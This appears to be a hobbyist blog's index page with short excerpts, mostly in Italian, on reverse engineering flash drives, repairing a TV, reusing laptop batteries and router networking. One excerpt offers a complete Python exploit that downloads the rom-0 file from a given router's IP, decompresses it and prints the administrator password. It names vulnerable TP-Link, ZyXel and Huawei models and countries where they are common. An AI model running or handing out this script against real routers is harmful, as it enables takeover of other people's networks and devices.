Hardware & Software hacking
Tiziano Bacocco 
In these days between some exercises for a microeconomics exam , i’ve continued to work on reverse engineering the Alcor 698x UFD microcontroller, and i’ve got another poor quality Alcor based flash drive from a friend , so now i’ve an 8 GB one , and a 4 GB one. I’ve started , with the … Read more
I’ve started that work because i want to port AlcorMP utility to Linux and to be able to use custom flash chips with these UFD chips, this utility called AlcorMP allows to do a lot of stuff , from checking flash integrity to programming the usb flash drive into a CD-Rom emulator. For who is … Read more
I’ve got that TV to be trashed, because after some hours it won’t turn on anymore, first thing i’ve checked is the power supply which was fine. The original board is labeled “T.MSD309.B21B”, and apparently it is a chinese universal LVDS LCD driver board. So i’ve checked on ebay and that board is available , … Read more
Premetto subito che le informazioni qui riportate sono per chi ha già una buona esperienza. Altra premessa è il fatto che non è detto che si possa far ritornare il router al suo stato di fabbrica dopo le modifiche descritte in questo articolo, se si vuole avere un punto di ripristino, eseguire prima di flashmem … Read more
It’s not unusual to end up with dead laptops whose battery is still useable for some other projects, the most usual practice, is to dismantle them to recover 18650 cells, but then you will have some prolems with integrating them on your project, the first one is avoiding stuff to catch fire or blow up … Read more
Capita spesso di ritrovarsi delle batterie di portatili defunti, di cui non si sa cosa farne, la cosa più semplice è spaccarla e recuperarci le celle 18650, ma se poi ci si vuole realizzare qualche progetto, sorge subito il problema di come sapere quanta % di carica ha, il tempo di ricarica, e soprattutto avere … Read more
Molto spesso può capitare di voler fare il forwarding dalla LAN alla LAN, ovvero avere un router che accetta i pacchetti in ingresso, e li reimmette sulla stessa rete magari eseguendoci sopra il load balancing o traffic shaping, ad esempio potrei avere una lan composta da un router alice, un router fastweb ed un server … Read more
Gran parte dei router TP-Link,ZyXel,Huawei ed alcuni linksys sono soggetti ad una vulnerabilità che permette di ottenere la password di amministratore DA REMOTO , lo script allegato permette, passandogli l’ip del router come parametro di tirare fuori la password instantaneamente
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 |
import os import sys from struct import <b>*</b> import urllib2 ###########################################################<b>###</b> # Lempel-Ziv-Stac decompression # BitReader and RingList classes # # Copyright (C) 2011 Filippo Valsorda - FiloSottile # filosottile.wiki gmail.com - www.pytux.it # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ###########################################################<b>###</b> import collections <b>class</b> BitReader: """ Gets a string or a iterable of chars (also mmap) representing bytes (ord) and permits to extract bits one by one like a stream """ <b>def</b> <b>__init__</b>(self, bytes): self._bits <b>=</b> collections.deque() <b>for</b> byte <b>in</b> bytes: byte <b>=</b> ord(byte) <b>for</b> n <b>in</b> xrange(8): self._bits.append(bool((byte <b>>></b> (7<b>-</b>n)) <b>&</b> 1)) <b>def</b> getBit(self): <b>return</b> self._bits.popleft() <b>def</b> getBits(self, num): res <b>=</b> 0 <b>for</b> i <b>in</b> xrange(num): res <b>+=</b> self.getBit() <b><<</b> num<b>-</b>1<b>-</b>i <b>return</b> res <b>def</b> getByte(self): <b>return</b> self.getBits(8) <b>def</b> <b>__len__</b>(self): <b>return</b> len(self._bits) <b>class</b> RingList: """ When the list is full, for every item appended the older is removed """ <b>def</b> <b>__init__</b>(self, length): self.__data__ <b>=</b> collections.deque() self.__full__ <b>=</b> False self.__max__ <b>=</b> length <b>def</b> append(self, x): <b>if</b> self.__full__: self.__data__.popleft() self.__data__.append(x) <b>if</b> self.size() <b>==</b> self.__max__: self.__full__ <b>=</b> True <b>def</b> get(self): <b>return</b> self.__data__ <b>def</b> size(self): <b>return</b> len(self.__data__) <b>def</b> maxsize(self): <b>return</b> self.__max__ <b>def</b> <b>__getitem__</b>(self, n): <b>if</b> n <b>>=</b> self.size(): <b>return</b> None <b>return</b> self.__data__[n] <b>def</b> LZSDecompress(data, window <b>=</b> RingList(2048)): """ Gets a string or a iterable of chars (also mmap) representing bytes (ord) and an optional pre-populated dictionary; return the decompressed string and the final dictionary """ reader <b>=</b> BitReader(data) result <b>=</b> '' <b>while</b> True: bit <b>=</b> reader.getBit() <b>if</b> <b>not</b> bit: char <b>=</b> reader.getByte() result <b>+=</b> chr(char) window.append(char) <b>else</b>: bit <b>=</b> reader.getBit() <b>if</b> bit: offset <b>=</b> reader.getBits(7) <b>if</b> offset <b>==</b> 0: # EOF <b>break</b> <b>else</b>: offset <b>=</b> reader.getBits(11) lenField <b>=</b> reader.getBits(2) <b>if</b> lenField <b><</b> 3: lenght <b>=</b> lenField <b>+</b> 2 <b>else</b>: lenField <b><<=</b> 2 lenField <b>+=</b> reader.getBits(2) <b>if</b> lenField <b><</b> 15: lenght <b>=</b> (lenField <b>&</b> 0x0f) <b>+</b> 5 <b>else</b>: lenCounter <b>=</b> 0 lenField <b>=</b> reader.getBits(4) <b>while</b> lenField <b>==</b> 15: lenField <b>=</b> reader.getBits(4) lenCounter <b>+=</b> 1 lenght <b>=</b> 15<b>*</b>lenCounter <b>+</b> 8 <b>+</b> lenField <b>for</b> i <b>in</b> xrange(lenght): char <b>=</b> window[<b>-</b>offset] result <b>+=</b> chr(char) window.append(char) <b>return</b> result, window <b>class</b> Object: <b>def</b> <b>__init__</b>(self,blockdata,data): self.name <b>=</b> data[:14].strip("x00") self.uncompsize <b>=</b> unpack(">H",data[14:16])[0] self.compsize <b>=</b> unpack(">H",data[16:18])[0] self.offset <b>=</b> unpack(">H",data[18:20])[0] print "Object",self.name ,self.uncompsize,self.compsize,self.offset self.data <b>=</b> blockdata[self.offset:self.offset<b>+</b>self.compsize] #print [self.data] <b>if</b> self.name <b>==</b> "spt.dat": data2 <b>=</b> self.data self.data <b>=</b> "" index <b>=</b> 12 <b>while</b> index <b><</b> self.uncompsize: orgsize <b>=</b> unpack(">H",data2[index:index<b>+</b>2])[0] rawsize <b>=</b> unpack(">H",data2[index<b>+</b>2:index<b>+</b>4])[0] #print orgsize,rawsize self.data <b>+=</b> LZSDecompress(data2[index<b>+</b>4:index<b>+</b>4<b>+</b>rawsize])[0] index <b>+=</b> rawsize print "Password:",self.data[20:].split("x00")[0] <b>class</b> Block: <b>def</b> <b>__init__</b>(self,data): self.blocknumber <b>=</b> ord(data[0]) self.unk1 <b>=</b> ord(data[1]) self.objectcount <b>=</b> unpack(">H",data[2:4])[0] self.blocklength <b>=</b> unpack(">H",data[4:6])[0] print "Block:",self.blocknumber , self.objectcount , self.blocklength self.objects <b>=</b> [] <b>for</b> i <b>in</b> range(0,self.objectcount): self.objects.append(Object(data,data[6<b>+</b>20<b>*</b>i:])) blocks <b>=</b> [] f <b>=</b> urllib2.urlopen("http://%s/rom-0"<b>%</b>sys.argv[1]) # = open(sys.argv[1],"rb") d <b>=</b> f.read() mem <b>=</b> Block(d[0x0:]) a <b>=</b> Block(d[0x2000:]) |
|
1 |
Le nazioni che principalmente hanno questi router vulnerabili sono Romania, Algeria, Egitto, Colombia, … Read more
Scrivo questo post, perché oggi è successo un evento che ha del ridicolo diciamo. Ero connesso ad Azzurra.org ( Network IRC , se non sapete cosa sia è inutile andare avanti nella lettura ) e stavo giocando a No more room in hell , con la linea Alice ADSL, e vedo che inizio ad avere … Read more
Torno di nuovo a scrivere per i problemi riguardanti la privacy con gli smartphone, perché si aggiunge, oltre al noto problema della scansione attiva e quindi dell’invio di probe diretti ad access point, anche un altro problema più grave originante da Whatsapp e Facebook, in pratica con tecniche di livello veramente base è possibile conoscere … Read more